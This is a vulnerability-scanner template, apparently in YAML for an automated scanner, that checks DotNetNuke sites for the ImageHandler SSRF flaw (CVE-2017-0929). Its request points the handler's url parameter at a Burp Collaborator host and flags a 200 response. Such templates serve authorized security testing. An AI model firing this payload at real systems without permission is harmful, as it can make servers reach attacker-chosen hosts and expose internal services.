id: dotnetnuke-imagehandler-ssrf info: name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) risk: Potential params: - root: "{{.BaseURL}}" - dest: "gcwyd66hvfkgc5ayfappvqbc93fv3k.burpcollaborator.net" # replicate: # prefixes: 'REPORTSERVER, ReportServer' requests: - method: GET url: >- {{.root}}/DnnImageHandler.ashx?mode=file&url={{.dest}} headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- StatusCode() == 200 && RegexSearch("body", "(?m)[a-z0-9]+") references: - links: - https://hackerone.com/reports/482634